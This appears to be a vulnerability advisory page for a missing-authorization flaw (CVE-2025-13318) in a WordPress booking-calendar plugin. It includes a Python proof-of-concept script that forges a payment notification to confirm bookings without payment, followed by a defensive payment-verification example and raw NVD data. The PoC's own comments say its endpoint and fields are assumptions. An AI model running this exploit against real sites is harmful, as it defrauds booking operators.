Security Vulnerability Report
CVE-2025-13318 CVSS 5.3 MEDIUM

Published: 2025-11-22 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Booking Calendar Contact Form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.60. This is due to missing authorization checks and payment verification in the `dex_bccf_check_IPN_verification` function. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and bypass payment requirements via the 'dex_bccf_ipn' parameter.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Booking Calendar Contact Form <= 1.2.60 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-13318 PoC - Booking Calendar Contact Form Missing Authorization

This PoC demonstrates the authorization bypass vulnerability in the
Booking Calendar Contact Form plugin for WordPress.
"""
import requests
import sys


def exploit_cve_2025_13318(target_url, booking_id):
    """
    Exploit the missing authorization vulnerability.

    Args:
        target_url: Base URL of the WordPress site
        booking_id: The booking ID to confirm without payment

    Returns:
        bool: True if exploitation appears successful
    """
    # Vulnerable endpoint
    # Note: the advisory names only the 'dex_bccf_ipn' parameter and the
    # dex_bccf_check_IPN_verification function; the endpoint and the other
    # request fields below are this PoC's own assumptions.
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Craft the malicious request
    # The 'dex_bccf_ipn' parameter triggers the vulnerable function
    # without any authorization or payment verification
    payload = {
        'action': 'dex_bccf_ipn',
        'dex_bccf_ipn': booking_id,
        'payment_status': 'completed',
        'txn_id': 'EXPLOIT_' + str(booking_id)
    }

    try:
        print(f"[*] Sending exploit request to: {endpoint}")
        print(f"[*] Targeting booking ID: {booking_id}")

        # Send the request (no authentication required)
        response = requests.post(endpoint, data=payload, timeout=10)

        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")

        # Check if the request was processed
        # (an HTTP 200 only shows the endpoint answered; it does not by
        # itself prove the booking record changed)
        if response.status_code == 200:
            print("[+] Exploit sent successfully!")
            print("[+] Booking should now be confirmed without payment verification")
            return True
        else:
            print("[-] Exploit may have failed")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def main():
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <booking_id>")
        print(f"Example: {sys.argv[0]} http://example.com 12345")
        sys.exit(1)

    target_url = sys.argv[1].rstrip('/')
    booking_id = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-13318 - Booking Calendar Contact Form Exploit")
    print("=" * 60)

    exploit_cve_2025_13318(target_url, booking_id)


if __name__ == '__main__':
    main()
```
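The description above says the IPN handler confirmed bookings with neither an authorization check nor payment verification, so a request shaped like the PoC was enough. The following is an added example, not the plugin's code and not its fix, modelling in Python the checks a payment-notification handler has to pass before a booking may be marked paid: the processor must confirm it actually sent the notification, the status must be a completed payment, the transaction id must be fresh, and the amount, currency and receiving account must match the server-side booking record. The field names (`payment_status`, `txn_id`, `custom`, `mc_gross`, `mc_currency`, `receiver_email`) follow PayPal's IPN variable naming as an assumption; the processor confirmation callback and every notification are constructed so the example runs offline.

```python
#!/usr/bin/env python3
"""
Payment-notification (IPN) handling with the checks the advisory says were
missing. Added example, not the plugin's code. Field names follow PayPal's
IPN naming as an assumption; the plugin's own format is not on the page.
"""
from dataclasses import dataclass, field
from decimal import Decimal, InvalidOperation
from typing import Callable, Dict, Mapping, Set


@dataclass
class Booking:
    booking_id: str
    amount: str        # price as stored server-side, e.g. "120.00"
    currency: str
    confirmed: bool = False


class IpnRejected(Exception):
    """Raised with the reason a notification must not confirm a booking."""


@dataclass
class IpnHandler:
    bookings: Dict[str, Booking]
    merchant_email: str
    # Asks the processor whether it really sent this notification. In
    # production this POSTs the raw body back to the processor's validation
    # endpoint; here it is injected so the example runs offline.
    processor_confirms: Callable[[Mapping[str, str]], bool]
    seen_txn_ids: Set[str] = field(default_factory=set)

    def handle(self, params: Mapping[str, str]) -> Booking:
        # 1. Authenticate: anyone can POST to the endpoint, so the notification
        #    proves nothing until the processor confirms it.
        if not self.processor_confirms(params):
            raise IpnRejected("processor did not confirm the notification")
        # 2. Only a completed payment confirms a booking (exact status string).
        if params.get("payment_status") != "Completed":
            raise IpnRejected(f"payment_status is {params.get('payment_status')!r}")
        # 3. Replay protection: one transaction id confirms at most one booking.
        txn_id = params.get("txn_id", "")
        if not txn_id or txn_id in self.seen_txn_ids:
            raise IpnRejected("missing or already-processed txn_id")
        # 4. The booking must exist; its id is echoed back in 'custom'.
        booking = self.bookings.get(params.get("custom", ""))
        if booking is None:
            raise IpnRejected("unknown booking id")
        # 5. Money must match the server-side record, not what the client sent.
        try:
            paid = Decimal(params.get("mc_gross", ""))
        except InvalidOperation:
            raise IpnRejected("mc_gross is not a decimal amount") from None
        if paid != Decimal(booking.amount) or params.get("mc_currency") != booking.currency:
            raise IpnRejected("amount or currency does not match the booking")
        # 6. The payment must have gone to this merchant's account.
        if params.get("receiver_email", "").lower() != self.merchant_email.lower():
            raise IpnRejected("receiver_email is not the merchant account")

        self.seen_txn_ids.add(txn_id)
        booking.confirmed = True
        return booking


def run_demo() -> Dict[str, str]:
    """Drive the handler with constructed notifications; returns outcome per case."""
    bookings = {"12345": Booking("12345", "120.00", "EUR")}
    # Constructed stand-in for the processor: it vouches only for notifications
    # carrying a marker a forger would not have.
    def stand_in(p: Mapping[str, str]) -> bool:
        return p.get("_constructed_processor_marker") == "issued-by-processor"
    handler = IpnHandler(bookings, "merchant@example.com", stand_in)

    genuine = {
        "_constructed_processor_marker": "issued-by-processor",
        "payment_status": "Completed", "txn_id": "TXN-0001", "custom": "12345",
        "mc_gross": "120.00", "mc_currency": "EUR",
        "receiver_email": "merchant@example.com",
    }
    # Same shape as the PoC request: a booking id and a status, nothing vouched for.
    forged = {"dex_bccf_ipn": "12345", "custom": "12345", "payment_status": "completed"}

    outcomes: Dict[str, str] = {}
    for name, params in (("forged", forged), ("genuine", genuine), ("replay", genuine)):
        try:
            handler.handle(params)
            outcomes[name] = "confirmed"
        except IpnRejected as e:
            outcomes[name] = f"rejected: {e}"
    outcomes["booking_confirmed"] = str(bookings["12345"].confirmed)
    return outcomes


if __name__ == "__main__":
    for case, result in run_demo().items():
        print(f"{case}: {result}")
```

The forged request fails at the first check, before any booking is touched; the genuine notification confirms the booking once, and its replay is refused on the transaction id. The ordering matters: the processor confirmation is the authorization step the advisory describes as absent, and every later check compares the notification against server-side state rather than trusting values in the request.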

References

https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/tags/1.2.59/dex_bccf.php#L1409
https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/trunk/dex_bccf.php#L1409
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399906%40booking-calendar-contact-form&new=3399906%40booking-calendar-contact-form&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/83b0ae2c-6b08-4b71-a728-c60722ec20c7?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13318",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-22T09:15:42.987",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Booking Calendar Contact Form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.60. This is due to missing authorization checks and payment verification in the `dex_bccf_check_IPN_verification` function. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and bypass payment requirements via the 'dex_bccf_ipn' parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/tags/1.2.59/dex_bccf.php#L1409",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/trunk/dex_bccf.php#L1409",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399906%40booking-calendar-contact-form&new=3399906%40booking-calendar-contact-form&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/83b0ae2c-6b08-4b71-a728-c60722ec20c7?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```